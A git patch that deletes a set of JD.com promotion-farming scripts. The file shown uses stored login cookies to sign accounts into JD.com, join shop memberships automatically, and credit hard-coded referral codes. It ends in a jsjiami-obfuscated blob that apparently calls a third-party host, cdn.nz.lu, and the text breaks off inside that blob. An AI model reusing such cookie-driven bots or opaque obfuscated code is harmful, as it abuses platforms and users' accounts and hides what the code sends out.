From 1e67c8c44c885138161dfef8a216f3f88fc47bb7 Mon Sep 17 00:00:00 2001 From: ooo Date: Sat, 18 Jun 2022 01:50:59 +0800 Subject: [PATCH] del --- jd_lzdz1_customized524.js | 562 ------------------------------------- jd_lzdz1_customized525.js | 510 ---------------------------------- jd_lzdz1_customized611.js | 570 -------------------------------------- jd_lzdz1_customized612.js | 562 ------------------------------------- jd_lzkjdz.js | 459 ------------------------------ jd_mpdz.js | 10 - jd_mpdzcar.js | 236 ---------------- jd_mpdzcar_game.js | 326 ---------------------- jd_mpdzcar_help.js | 338 ---------------------- 9 files changed, 3573 deletions(-) delete mode 100644 jd_lzdz1_customized524.js delete mode 100644 jd_lzdz1_customized525.js delete mode 100644 jd_lzdz1_customized611.js delete mode 100644 jd_lzdz1_customized612.js delete mode 100644 jd_lzkjdz.js delete mode 100755 jd_mpdz.js delete mode 100644 jd_mpdzcar.js delete mode 100644 jd_mpdzcar_game.js delete mode 100644 jd_mpdzcar_help.js diff --git a/jd_lzdz1_customized524.js b/jd_lzdz1_customized524.js deleted file mode 100644 index 6fc4603..0000000 --- a/jd_lzdz1_customized524.js +++ /dev/null @@ -1,562 +0,0 @@ -/* -大牌会员日 -*/ -const $ = new Env("大牌会员日"); -const jdCookieNode = $.isNode() ? require("./jdCookie.js") : ""; -const notify = $.isNode() ? require("./sendNotify") : ""; -let cookiesArr = [], cookie = "", message = ""; -let ownCode = null; -let authorCodeList = []; -if ($.isNode()) { - Object.keys(jdCookieNode).forEach((item) => { - cookiesArr.push(jdCookieNode[item]); - }); - if (process.env.JD_DEBUG && process.env.JD_DEBUG === "false") console.log = () => {}; -} else { - let cookiesData = $.getdata("CookiesJD") || "[]"; - cookiesData = JSON.parse(cookiesData); - cookiesArr = cookiesData.map((item) => item.cookie); - cookiesArr.reverse(); - cookiesArr.push(...[$.getdata("CookieJD2"), $.getdata("CookieJD")]); - cookiesArr.reverse(); - cookiesArr = cookiesArr.filter((item) => !!item); -} -!(async () => { - $.getAuthorCodeListerr = false; - if (!cookiesArr[0]) { - $.msg($.name, "【提示】请先获取京东账号一cookie\n直接使用NobyDa的京东签到获取", "https://bean.m.jd.com/bean/signIndex.action", { "open-url": "https://bean.m.jd.com/bean/signIndex.action" }); - return; - } - // authorCodeList = await getAuthorCodeList('https://raw.githubusercontent.com/okyyds/duck/master/code/lzdz10.json') - // console.log(authorCodeList) - // if ($.getAuthorCodeListerr === false) { - // authorCodeList = [ - // 'f7d7bcdc4d3e408ea0a584f27f617e4b', - // '78cd453ae0af483e8c7da5d3f8a857bd', - // '40619ea93a2c42c3ae46a1e37111a7ea', - // ] - // } - for (let i = 0; i < cookiesArr.length; i++) { - if (cookiesArr[i]) { - cookie = cookiesArr[i]; - originCookie = cookiesArr[i]; - newCookie = ""; - $.UserName = decodeURIComponent(cookie.match(/pt_pin=(.+?);/) && cookie.match(/pt_pin=(.+?);/)[1]); - $.index = i + 1; - $.isLogin = true; - $.nickName = ""; - $.getFirstLZCKerr = '' - await checkCookie(); - console.log(`\n******开始【京东账号${$.index}】${$.nickName || $.UserName}*********\n`); - if (!$.isLogin) { - $.msg($.name, `【提示】cookie已失效`, `京东账号${$.index} ${$.nickName || $.UserName}\n请重新登录获取\nhttps://bean.m.jd.com/bean/signIndex.action`, { "open-url": "https://bean.m.jd.com/bean/signIndex.action" }); - // if ($.isNode()) { - // await notify.sendNotify(`${$.name}cookie已失效 - ${$.UserName}`, `京东账号${$.index} ${$.UserName}\n请重新登录获取cookie`); - // } - continue; - } - $.bean = 0; - $.ADID = getUUID("xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", 1); - $.UUID = getUUID("xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"); - authorCodeList = [ - '8bb3954e8c2445c7a8fbcd05c5ab8f74', - '9c2945adfd1c41d6b9961be26f3a8c9a', - '0408ce92d6d549f88f372b395cc93a18', - ]; - // $.authorCode = authorCodeList[random(0, authorCodeList.length)]; - $.authorCode = ownCode ? ownCode : authorCodeList[random(0, authorCodeList.length)] - $.authorNum = `${random(1000000, 9999999)}`; - $.randomCode = random(1000000, 9999999); - $.activityId = "dzcdee05240f344982abf6fd43ceb0"; - $.activityShopId = "1000003663"; - $.activityUrl = `https://lzdz1-isv.isvjcloud.com/dingzhi/bigname/memberday/activity/${$.authorNum}?activityId=${$.activityId}&shareUuid=${encodeURIComponent($.authorCode)}&adsource=null&shareuserid4minipg=${encodeURIComponent($.secretPin)}&shopid=1000003663&lng=00.000000&lat=00.000000&sid=&un_area=`; - await member(); - if ($.getFirstLZCKerr.indexOf('493') != -1) { - break - } - await $.wait(3000); - if ($.bean > 0) { - message += `\n【京东账号${$.index}】${$.nickName || $.UserName} \n └ 获得 ${$.bean} 京豆。`; - } - } - } - if (message !== "") { - if ($.isNode()) { - await notify.sendNotify($.name, message, "", `\n`); - } else { - $.msg($.name, "有点儿收获", message); - } - } -})() - .catch((e) => { - $.log("", `❌ ${$.name}, 失败! 原因: ${e}!`, ""); - }) - .finally(() => { - $.done(); - }); - -async function member() { - $.token = null; - $.secretPin = null; - $.openCardActivityId = null; - $.doFollowShop = false - lz_cookie = {}; - await getFirstLZCK(); - await getToken(); - await task("dz/common/getSimpleActInfoVo", `activityId=${$.activityId}`, 1); - if ($.token) { - await getMyPing(); - if ($.secretPin) { - console.log("去助力 -> " + $.authorCode); - await taskaccessLog("common/accessLogWithAD", `venderId=${$.activityShopId}&code=99&pin=${encodeURIComponent($.secretPin)}&activityId=${$.activityId}&pageUrl=${$.activityUrl}&subType=app&adSource=null`, 1); - await task("wxActionCommon/getUserInfo", `pin=${encodeURIComponent($.secretPin)}`, 1); - if ($.index === 1) { - await task("bigname/memberday/activityContent", `activityId=${$.activityId}&pin=${encodeURIComponent($.secretPin)}&pinImg=&nick=${encodeURIComponent($.pin)}&cjyxPin=&cjhyPin=&shareUuid=${encodeURIComponent($.authorCode)}`, 0, 1); - } else { - await task("bigname/memberday/activityContent", `activityId=${$.activityId}&pin=${encodeURIComponent($.secretPin)}&pinImg=&nick=${encodeURIComponent($.pin)}&cjyxPin=&cjhyPin=&shareUuid=${encodeURIComponent($.authorCode)}`); - } - // $.log("关注店铺"); - // await task("bigname/memberday/saveTask", `activityId=${$.activityId}&actorUuid=${encodeURIComponent($.actorUuid)}&pin=${encodeURIComponent($.secretPin)}&taskType=23&taskValue=23&shareUuid=${encodeURIComponent($.authorCode)}`); - // await task("taskact/common/drawContent", `activityId=${$.activityId}&pin=${encodeURIComponent($.secretPin)}`); - await task("bigname/memberday/initOpenCard", `pin=${encodeURIComponent($.secretPin)}&activityId=${$.activityId}&shareUuid=${encodeURIComponent($.authorCode)}`); - $.log("加入店铺会员"); - if ($.openCardList) { - taskList = []; - $.openCardList.filter((x) => { if (!x.openStatus) { taskList.push(x) } }) - for (const vo of taskList) { - // console.log(vo.openStatus) - $.log(`>>> 去加入 ${vo.venderId}`); - if (vo.openStatus === false) { - $.log(`>>> 准备加入会员`); - await getShopOpenCardInfo({ venderId: `${vo.venderId}`, channel: "401" }, vo.venderId); - await bindWithVender({ venderId: `${vo.venderId}`, bindByVerifyCodeFlag: 1, registerExtend: {}, writeChildFlag: 0, activityId: $.openCardActivityId, channel: 401 }, vo.venderId); - await $.wait(1500); - } else { - $.log(`>>> 已经是会员`); - } - } - console.log("绑定助力"); - await task("bigname/memberday/initOpenCard", `pin=${encodeURIComponent($.secretPin)}&activityId=${$.activityId}&shareUuid=${encodeURIComponent($.authorCode)}`); - } else { - console.log("已关注店铺"); - } - - // console.log("去助力 -> " + $.authorCode); - // await task("linkgame/assist/status", `activityId=${$.activityId}&pin=${encodeURIComponent($.secretPin)}&shareUuid=${$.authorCode}`); - // await task("linkgame/assist", `activityId=${$.activityId}&pin=${encodeURIComponent($.secretPin)}&shareUuid=${$.authorCode}`); - // await task('linkgame/help/list', `pin=${encodeURIComponent($.secretPin)}&activityId=${$.activityId}`) - // await task('bigname/memberday/startGame', `pin=${encodeURIComponent($.secretPin)}&activityId=${$.activityId}`) - // await task('bigname/memberday/endGame', `pin=${encodeURIComponent($.secretPin)}&activityId=${$.activityId}&gameId=${$.gameId}&score=${$.score}`) - // console.log('任务 -> ') - // await $.wait(2000) - // await task('opencard/addCart', `activityId=${$.activityId}&pin=${encodeURIComponent($.secretPin)}`); - // await $.wait(2000) - // await task('linkgame/sendAllCoupon', `activityId=${$.activityId}&pin=${encodeURIComponent($.secretPin)}`); - // await getFirstLZCK() - // await getToken(); - // console.log('抽奖 -> ') - // await $.wait(2000) - // await task('bigname/memberday/draw', `activityId=${$.activityId}&pin=${encodeURIComponent($.secretPin)}`); - // await $.wait(2000) - // await task('bigname/memberday/draw', `activityId=${$.activityId}&pin=${encodeURIComponent($.secretPin)}`); - // await $.wait(2000) - // await task('bigname/memberday/draw', `activityId=${$.activityId}&pin=${encodeURIComponent($.secretPin)}`); - // await $.wait(2000) - // await task('bigname/memberday/draw', `activityId=${$.activityId}&pin=${encodeURIComponent($.secretPin)}`); - // await $.wait(2000) - // await task('bigname/memberday/draw', `activityId=${$.activityId}&pin=${encodeURIComponent($.secretPin)}`); - // console.log('100 -> ') - // await getFirstLZCK() - // await getToken(); - // await $.wait(2000) - // await task('linkgame/draw/record', `activityId=${$.activityId}&actorUuid=${$.actorUuid}&pin=${encodeURIComponent($.secretPin)}`); - } - } -} - -function task(function_id, body, isCommon = 0, own = 0) { - return new Promise((resolve) => { - $.post(taskUrl(function_id, body, isCommon), async (err, resp, data) => { - try { - if (err) { - $.log(err); - } else { - if (data) { - data = JSON.parse(data); - if (data.result) { - switch (function_id) { - case "dz/common/getSimpleActInfoVo": - $.jdActivityId = data.data.jdActivityId; - $.venderId = data.data.venderId; - $.activityType = data.data.activityType; - // console.log($.venderId) - break; - case "wxActionCommon/getUserInfo": - break; - case "bigname/memberday/activityContent": - if (!data.data.hasEnd) { - $.log(`开启【${data.data.activityName}】活动`); - $.log("-------------------"); - if ($.index === 1) { - ownCode = data.data.actorUuid; - console.log(ownCode); - } - $.actorUuid = data.data.actorUuid; - } else { - $.log("活动已经结束"); - } - break; - case "bigname/memberday/initOpenCard": - $.openCardList = data.data.openInfo; - $.openCardStatus = data.data.allOpenCard; - // console.log(data) - break; - case "bigname/memberday/saveTask": - if (data) { - console.log(data); - $.doFollowShop = true - } - break; - case "bigname/memberday/draw": - console.log(data); - break; - case "opencard/addCart": - if (data.data) { - console.log(data.data); - } - break; - case "linkgame/sendAllCoupon": - if (data.data) { - console.log(data.data); - } - - break; - case "interaction/write/writePersonInfo": - console.log(data); - break; - case "linkgame/draw": - console.log(data); - break; - case "linkgame/draw/record": - console.log(data.data); - break; - case "linkgame/assist/status": - $.log(JSON.stringify(data)); - break; - case "linkgame/assist": - $.log(JSON.stringify(data)); - break; - case "opencard/help/list": - $.log(JSON.stringify(data)); - break; - default: - // $.log(JSON.stringify(data)) - break; - } - } else { - // $.log(JSON.stringify(data)) - } - } else { - // $.log("京东没有返回数据") - } - } - } catch (error) { - $.log(error); - } finally { - resolve(); - } - }); - }); -} -function taskaccessLog(function_id, body, isCommon = 0) { - return new Promise((resolve) => { - $.post(taskUrl(function_id, body, isCommon), async (err, resp, data) => { - try { - if (err) { - $.log(err); - } else { - // console.log(resp); - if (resp["headers"]["set-cookie"]) { - cookie = `${originCookie};`; - for (let sk of resp["headers"]["set-cookie"]) { - lz_cookie[sk.split(";")[0].substr(0, sk.split(";")[0].indexOf("="))] = sk.split(";")[0].substr(sk.split(";")[0].indexOf("=") + 1); - } - for (const vo of Object.keys(lz_cookie)) { - cookie += vo + "=" + lz_cookie[vo] + ";"; - } - } - } - } catch (error) { - console.log(error); - } finally { - resolve(); - } - }); - }); -} - -function getAuthorCodeList(url) { - return new Promise((resolve) => { - const options = { - url: `${url}?${new Date()}`, - timeout: 10000, - headers: { - "User-Agent": "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Edg/87.0.4280.88", - }, - }; - $.get(options, async (err, resp, data) => { - try { - if (err) { - // $.log(err) - $.getAuthorCodeListerr = false; - } else { - if (data) data = JSON.parse(data); - $.getAuthorCodeListerr = true; - } - } catch (e) { - $.logErr(e, resp); - data = null; - } finally { - resolve(data); - } - }); - }); -} - -function taskUrl(function_id, body, isCommon) { - return { - url: isCommon ? `https://lzdz1-isv.isvjcloud.com/${function_id}` : `https://lzdz1-isv.isvjcloud.com/dingzhi/${function_id}`, - headers: { - Host: "lzdz1-isv.isvjcloud.com", - Accept: "application/json", - "X-Requested-With": "XMLHttpRequest", - "Accept-Language": "zh-cn", - "Accept-Encoding": "gzip, deflate, br", - "Content-Type": "application/x-www-form-urlencoded", - Origin: "https://lzdz1-isv.isvjcloud.com", - "User-Agent": `jdapp;iPhone;9.5.4;13.6;${$.UUID};network/wifi;ADID/${$.ADID};model/iPhone10,3;addressid/0;appBuild/167668;jdSupportDarkMode/0;Mozilla/5.0 (iPhone; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148;supportJDSHWK/1`, - Connection: "keep-alive", - Referer: $.activityUrl, - Cookie: $.cookie, - }, - body: body, - }; -} - -function getMyPing() { - let opt = { - url: `https://lzdz1-isv.isvjcloud.com/customer/getMyPing`, - headers: { - Host: "lzdz1-isv.isvjcloud.com", - Accept: "application/json", - "X-Requested-With": "XMLHttpRequest", - "Accept-Language": "zh-cn", - "Accept-Encoding": "gzip, deflate, br", - "Content-Type": "application/x-www-form-urlencoded", - Origin: "https://lzdz1-isv.isvjcloud.com", - "User-Agent": `jdapp;iPhone;9.5.4;13.6;${$.UUID};network/wifi;ADID/${$.ADID};model/iPhone10,3;addressid/0;appBuild/167668;jdSupportDarkMode/0;Mozilla/5.0 (iPhone; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148;supportJDSHWK/1`, - Connection: "keep-alive", - Referer: $.activityUrl, - Cookie: cookie, - }, - body: `userId=${$.activityShopId}&token=${$.token}&fromType=APP&riskType=1`, - }; - return new Promise((resolve) => { - $.post(opt, (err, resp, data) => { - try { - if (err) { - $.log(err); - } else { - if (resp["headers"]["set-cookie"]) { - cookie = `${originCookie}`; - if ($.isNode()) { - for (let sk of resp["headers"]["set-cookie"]) { - cookie = `${cookie}${sk.split(";")[0]};`; - } - } else { - for (let ck of resp["headers"]["Set-Cookie"].split(",")) { - cookie = `${cookie}${ck.split(";")[0]};`; - } - } - } - if (resp["headers"]["Set-Cookie"]) { - cookie = `${originCookie}`; - if ($.isNode()) { - for (let sk of resp["headers"]["set-cookie"]) { - cookie = `${cookie}${sk.split(";")[0]};`; - } - } else { - for (let ck of resp["headers"]["Set-Cookie"].split(",")) { - cookie = `${cookie}${ck.split(";")[0]};`; - } - } - } - if (data) { - data = JSON.parse(data); - if (data.result) { - $.log(`你好:${data.data.nickname}`); - $.pin = data.data.nickname; - $.secretPin = data.data.secretPin; - cookie = `${cookie};AUTH_C_USER=${data.data.secretPin}`; - } else { - $.log(data.errorMessage); - } - } else { - $.log("京东返回了空数据"); - } - } - } catch (error) { - $.log(error); - } finally { - resolve(); - } - }); - }); -} -function getFirstLZCK() { - return new Promise((resolve) => { - $.get( - { - url: $.activityUrl, - headers: { - "user-agent": $.isNode() ? process.env.JD_USER_AGENT ? process.env.JD_USER_AGENT : require("./USER_AGENTS").USER_AGENT : $.getdata("JDUA") ? $.getdata("JDUA") : "jdapp;iPhone;9.4.4;14.3;network/4g;Mozilla/5.0 (iPhone; CPU iPhone OS 14_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148;supportJDSHWK/1", - }, - }, - (err, resp, data) => { - try { - if (err) { - $.getFirstLZCKerr = err - console.log(err); - } else { - if (resp["headers"]["set-cookie"]) { - cookie = `${originCookie}`; - if ($.isNode()) { - for (let sk of resp["headers"]["set-cookie"]) { - cookie = `${cookie}${sk.split(";")[0]};`; - } - } else { - for (let ck of resp["headers"]["Set-Cookie"].split(",")) { - cookie = `${cookie}${ck.split(";")[0]};`; - } - } - } - if (resp["headers"]["Set-Cookie"]) { - cookie = `${originCookie}`; - if ($.isNode()) { - for (let sk of resp["headers"]["set-cookie"]) { - cookie = `${cookie}${sk.split(";")[0]};`; - } - } else { - for (let ck of resp["headers"]["Set-Cookie"].split(",")) { - cookie = `${cookie}${ck.split(";")[0]};`; - } - } - } - $.cookie = cookie - } - } catch (error) { - console.log(error); - } finally { - resolve(); - } - } - ); - }); -} -function getToken() { - let opt = { - url: `https://api.m.jd.com/client.action?functionId=isvObfuscator`, - headers: { - Host: "api.m.jd.com", - "Content-Type": "application/x-www-form-urlencoded", - Accept: "*/*", - Connection: "keep-alive", - Cookie: cookie, - "User-Agent": "JD4iPhone/167650 (iPhone; iOS 13.7; Scale/3.00)", - "Accept-Language": "zh-Hans-CN;q=1", - "Accept-Encoding": "gzip, deflate, br", - }, - body: `body=%7B%22url%22%3A%20%22https%3A//lzkj-isv.isvjcloud.com%22%2C%20%22id%22%3A%20%22%22%7D&uuid=hjudwgohxzVu96krv&client=apple&clientVersion=9.4.0&st=1620476162000&sv=111&sign=f9d1b7e3b943b6a136d54fe4f892af05`, - }; - return new Promise((resolve) => { - $.post(opt, (err, resp, data) => { - try { - if (err) { - $.log(err); - } else { - if (data) { - data = JSON.parse(data); - if (data.code === "0") { - $.token = data.token; - } - } else { - $.log("京东返回了空数据"); - } - } - } catch (error) { - $.log(error); - } finally { - resolve(); - } - }); - }); -} -function random(min, max) { - return Math.floor(Math.random() * (max - min)) + min; -} -function getUUID(format = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx", UpperCase = 0) { - return format.replace(/[xy]/g, function (c) { - var r = (Math.random() * 16) | 0, - v = c == "x" ? r : (r & 0x3) | 0x8; - if (UpperCase) { - uuid = v.toString(36).toUpperCase(); - } else { - uuid = v.toString(36); - } - return uuid; - }); -} -function checkCookie() { - const options = { - url: "https://me-api.jd.com/user_new/info/GetJDUserInfoUnion", - headers: { - Host: "me-api.jd.com", - Accept: "*/*", - Connection: "keep-alive", - Cookie: cookie, - "User-Agent": "Mozilla/5.0 (iPhone; CPU iPhone OS 14_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.2 Mobile/15E148 Safari/604.1", - "Accept-Language": "zh-cn", - Referer: "https://home.m.jd.com/myJd/newhome.action?sceneval=2&ufc=&", - "Accept-Encoding": "gzip, deflate, br", - }, - }; - return new Promise((resolve) => { - $.get(options, (err, resp, data) => { - try { - if (err) { - $.logErr(err); - } else { - if (data) { - data = JSON.parse(data); - if (data.retcode === "1001") { - $.isLogin = false; //cookie过期 - return; - } - if (data.retcode === "0" && data.data.hasOwnProperty("userInfo")) { - $.nickName = data.data.userInfo.baseInfo.nickname; - } - } else { - $.log("京东返回了空数据"); - } - } - } catch (e) { - $.logErr(e); - } finally { - resolve(); - } - }); - }); -} -// prettier-ignore -var _0xod7='jsjiami.com.v6',_0xod7_=['‮_0xod7'],_0x1acd=[_0xod7,'\x53\x33\x4a\x54\x56\x32\x4d\x3d','\x54\x47\x4e\x4c\x62\x6e\x6b\x3d','\x62\x47\x39\x6e','\x63\x47\x46\x79\x63\x32\x55\x3d','\x63\x33\x56\x6a\x59\x32\x56\x7a\x63\x77\x3d\x3d','\x63\x6d\x56\x7a\x64\x57\x78\x30','\x61\x57\x35\x30\x5a\x58\x4a\x6c\x63\x33\x52\x7a\x55\x6e\x56\x73\x5a\x55\x78\x70\x63\x33\x51\x3d','\x62\x33\x42\x6c\x62\x6b\x4e\x68\x63\x6d\x52\x42\x59\x33\x52\x70\x64\x6d\x6c\x30\x65\x55\x6c\x6b','\x61\x57\x35\x30\x5a\x58\x4a\x6c\x63\x33\x52\x7a\x53\x57\x35\x6d\x62\x77\x3d\x3d','\x59\x57\x4e\x30\x61\x58\x5a\x70\x64\x48\x6c\x4a\x5a\x41\x3d\x3d','\x56\x45\x56\x4a\x59\x57\x38\x3d','\x55\x6d\x78\x6d\x59\x32\x4d\x3d','\x63\x45\x39\x31\x52\x6b\x4d\x3d','\x64\x6e\x5a\x75\x57\x45\x4d\x3d','\x62\x33\x64\x32\x5a\x47\x55\x3d','\x59\x33\x70\x4b\x62\x47\x67\x3d','\x51\x55\x64\x59\x59\x30\x6b\x3d','\x54\x30\x4a\x58\x55\x45\x59\x3d','\x56\x57\x6c\x55\x51\x33\x63\x3d','\x59\x6d\x6c\x75\x5a\x46\x64\x70\x64\x47\x68\x57\x5a\x57\x35\x6b\x5a\x58\x49\x3d','\x52\x57\x52\x36\x62\x57\x67\x3d','\x55\x48\x56\x58\x62\x6b\x59\x3d','\x61\x48\x52\x30\x63\x48\x4d\x36\x4c\x79\x39\x68\x63\x47\x6b\x75\x62\x53\x35\x71\x5a\x43\x35\x6a\x62\x32\x30\x76\x59\x32\x78\x70\x5a\x57\x35\x30\x4c\x6d\x46\x6a\x64\x47\x6c\x76\x62\x6a\x38\x3d','\x52\x33\x5a\x75\x55\x6c\x55\x3d','\x52\x6c\x5a\x71\x53\x30\x55\x3d','\x56\x47\x35\x69\x63\x30\x73\x3d','\x61\x6e\x6c\x47\x54\x31\x41\x3d','\x66\x53\x5a\x6a\x61\x47\x46\x75\x62\x6d\x56\x73\x50\x54\x51\x77\x4d\x53\x5a\x79\x5a\x58\x52\x31\x63\x6d\x35\x56\x63\x6d\x77\x39','\x59\x55\x78\x36\x61\x31\x63\x3d','\x56\x6d\x74\x75\x62\x33\x51\x3d','\x54\x56\x6c\x6f\x54\x45\x4d\x3d','\x62\x58\x64\x34\x52\x47\x30\x3d','\x65\x6c\x5a\x70\x59\x57\x34\x3d','\x52\x55\x46\x4a\x51\x6b\x45\x3d','\x53\x57\x70\x7a\x59\x6b\x6f\x3d','\x56\x55\x74\x79\x61\x46\x55\x3d','\x56\x32\x74\x69\x53\x45\x77\x3d','\x54\x46\x4a\x49\x61\x6b\x77\x3d','\x54\x30\x4e\x44\x54\x6e\x63\x3d','\x56\x31\x70\x7a\x57\x56\x6f\x3d','\x56\x33\x4e\x72\x63\x48\x67\x3d','\x61\x56\x42\x6b\x5a\x58\x67\x3d','\x51\x6e\x64\x6c\x55\x31\x63\x3d','\x65\x57\x35\x5a\x63\x58\x49\x3d','\x63\x47\x74\x50\x64\x58\x4d\x3d','\x57\x6d\x56\x5a\x62\x6c\x67\x3d','\x61\x56\x68\x4e\x54\x33\x6b\x3d','\x62\x56\x5a\x33\x65\x56\x67\x3d','\x55\x47\x4a\x50\x51\x55\x49\x3d','\x54\x33\x68\x74\x56\x57\x59\x3d','\x62\x55\x31\x52\x61\x33\x59\x3d','\x53\x57\x4a\x45\x62\x56\x45\x3d','\x59\x6d\x6c\x75\x5a\x46\x64\x70\x64\x47\x68\x57\x5a\x57\x35\x6b\x5a\x58\x4a\x74\x5a\x58\x4e\x7a\x59\x57\x64\x6c','\x62\x57\x56\x7a\x63\x32\x46\x6e\x5a\x51\x3d\x3d','\x5a\x57\x35\x32','\x55\x30\x6c\x48\x54\x6c\x39\x56\x55\x6b\x77\x3d','\x59\x6d\x52\x6e\x63\x30\x30\x3d','\x57\x6b\x74\x34\x53\x6b\x34\x3d','\x59\x30\x56\x51\x63\x6d\x4d\x3d','\x65\x45\x64\x72\x54\x47\x38\x3d','\x5a\x45\x74\x57\x64\x6d\x67\x3d','\x51\x58\x68\x73\x63\x6d\x6f\x3d','\x4f\x47\x46\x6b\x5a\x6d\x49\x3d','\x61\x6d\x52\x66\x63\x32\x68\x76\x63\x46\x39\x74\x5a\x57\x31\x69\x5a\x58\x49\x3d','\x4f\x53\x34\x79\x4c\x6a\x41\x3d','\x61\x6d\x52\x7a\x61\x57\x64\x75\x4c\x6d\x4e\x6d','\x59\x58\x42\x77\x62\x47\x6c\x6a\x59\x58\x52\x70\x62\x32\x34\x76\x61\x6e\x4e\x76\x62\x67\x3d\x3d','\x64\x6c\x6c\x43\x5a\x45\x67\x3d','\x51\x6b\x31\x47\x61\x33\x6b\x3d','\x61\x58\x56\x36\x61\x31\x45\x3d','\x5a\x30\x68\x33\x52\x58\x6f\x3d','\x55\x32\x56\x4d\x52\x6e\x45\x3d','\x52\x57\x35\x59\x65\x6c\x6b\x3d','\x55\x48\x70\x34\x63\x55\x67\x3d','\x54\x6c\x52\x42\x55\x56\x41\x3d','\x61\x30\x56\x78\x65\x6e\x45\x3d','\x61\x6c\x5a\x59\x63\x48\x45\x3d','\x51\x57\x31\x4f\x63\x6b\x6b\x3d','\x63\x57\x6c\x43\x64\x32\x63\x3d','\x5a\x6d\x78\x76\x62\x33\x49\x3d','\x62\x46\x6c\x57\x65\x47\x73\x3d','\x63\x6d\x46\x75\x5a\x47\x39\x74','\x62\x47\x56\x75\x5a\x33\x52\x6f','\x61\x48\x52\x30\x63\x48\x4d\x36\x4c\x79\x39\x6a\x5a\x47\x34\x75\x62\x6e\x6f\x75\x62\x48\x55\x76\x5a\x32\x56\x30\x61\x44\x56\x7a\x64\x41\x3d\x3d','\x52\x47\x5a\x61\x62\x32\x67\x3d','\x57\x45\x4e\x36\x62\x6e\x59\x3d','\x63\x47\x39\x7a\x64\x41\x3d\x3d','\x53\x6b\x64\x4a\x53\x6b\x6f\x3d','\x59\x30\x78\x31\x57\x56\x63\x3d','\x53\x6d\x56\x74\x64\x6b\x67\x3d','\x56\x46\x4e\x6c\x59\x55\x59\x3d','\x5a\x6c\x64\x6d\x54\x31\x51\x3d','\x59\x58\x42\x77\x62\x48\x6b\x3d','\x65\x6b\x39\x49\x64\x45\x67\x3d','\x56\x46\x70\x75\x51\x6d\x6f\x3d','\x62\x47\x39\x6e\x52\x58\x4a\x79','\x61\x30\x64\x42\x55\x55\x51\x3d','\x56\x46\x6c\x48\x57\x48\x6f\x3d','\x59\x58\x42\x70\x4c\x6d\x30\x75\x61\x6d\x51\x75\x59\x32\x39\x74','\x4b\x69\x38\x71','\x61\x32\x56\x6c\x63\x43\x31\x68\x62\x47\x6c\x32\x5a\x51\x3d\x3d','\x65\x6d\x67\x74\x59\x32\x34\x3d','\x5a\x33\x70\x70\x63\x43\x77\x67\x5a\x47\x56\x6d\x62\x47\x46\x30\x5a\x53\x77\x67\x59\x6e\x49\x3d','\x61\x48\x52\x30\x63\x48\x4d\x36\x4c\x79\x39\x68\x63\x47\x6b\x75\x62\x53\x35\x71\x5a\x43\x35\x6a\x62\x32\x30\x76\x59\x32\x78\x70\x5a\x57\x35\x30\x4c\x6d\x46\x6a\x64\x47\x6c\x76\x62\x6a\x39\x68\x63\x48\x42\x70\x5a\x44\x31\x71\x5a\x46\x39\x7a\x61\x47\x39\x77\x58\x32\x31\x6c\x62\x57\x4a\x6c\x63\x69\x5a\x6d\x64\x57\x35\x6a\x64\x47\x6c\x76\x62\x6b\x6c\x6b\x50\x57\x64\x6c\x64\x46\x4e\x6f\x62\x33\x42\x50\x63\x47\x56\x75\x51\x32\x46\x79\x5a\x45\x6c\x75\x5a\x6d\x38\x6d\x59\x6d\x39\x6b\x65\x54\x30\x3d','\x65\x47\x52\x75\x51\x6c\x49\x3d','\x63\x33\x52\x79\x61\x57\x35\x6e\x61\x57\x5a\x35','\x4a\x6d\x4e\x73\x61\x57\x56\x75\x64\x44\x31\x49\x4e\x53\x5a\x6a\x62\x47\x6c\x6c\x62\x6e\x52\x57\x5a\x58\x4a\x7a\x61\x57\x39\x75\x50\x54\x6b\x75\x4d\x69\x34\x77\x4a\x6e\x56\x31\x61\x57\x51\x39\x4f\x44\x67\x34\x4f\x44\x67\x3d','\x55\x6b\x70\x46\x55\x33\x6f\x3d','\x62\x48\x5a\x6c\x64\x6e\x67\x3d','\x59\x31\x68\x71\x63\x6e\x41\x3d','\x61\x6d\x52\x68\x63\x48\x41\x37\x61\x56\x42\x6f\x62\x32\x35\x6c\x4f\x7a\x6b\x75\x4e\x53\x34\x30\x4f\x7a\x45\x7a\x4c\x6a\x59\x37','\x56\x56\x56\x4a\x52\x41\x3d\x3d','\x4f\x32\x35\x6c\x64\x48\x64\x76\x63\x6d\x73\x76\x64\x32\x6c\x6d\x61\x54\x74\x42\x52\x45\x6c\x45\x4c\x77\x3d\x3d','\x51\x55\x52\x4a\x52\x41\x3d\x3d','\x4f\x32\x31\x76\x5a\x47\x56\x73\x4c\x32\x6c\x51\x61\x47\x39\x75\x5a\x54\x45\x77\x4c\x44\x4d\x37\x59\x57\x52\x6b\x63\x6d\x56\x7a\x63\x32\x6c\x6b\x4c\x7a\x41\x37\x59\x58\x42\x77\x51\x6e\x56\x70\x62\x47\x51\x76\x4d\x54\x59\x33\x4e\x6a\x59\x34\x4f\x32\x70\x6b\x55\x33\x56\x77\x63\x47\x39\x79\x64\x45\x52\x68\x63\x6d\x74\x4e\x62\x32\x52\x6c\x4c\x7a\x41\x37\x54\x57\x39\x36\x61\x57\x78\x73\x59\x53\x38\x31\x4c\x6a\x41\x67\x4b\x47\x6c\x51\x61\x47\x39\x75\x5a\x54\x73\x67\x51\x31\x42\x56\x49\x47\x6c\x51\x61\x47\x39\x75\x5a\x53\x42\x50\x55\x79\x41\x78\x4d\x31\x38\x32\x49\x47\x78\x70\x61\x32\x55\x67\x54\x57\x46\x6a\x49\x45\x39\x54\x49\x46\x67\x70\x49\x45\x46\x77\x63\x47\x78\x6c\x56\x32\x56\x69\x53\x32\x6c\x30\x4c\x7a\x59\x77\x4e\x53\x34\x78\x4c\x6a\x45\x31\x49\x43\x68\x4c\x53\x46\x52\x4e\x54\x43\x77\x67\x62\x47\x6c\x72\x5a\x53\x42\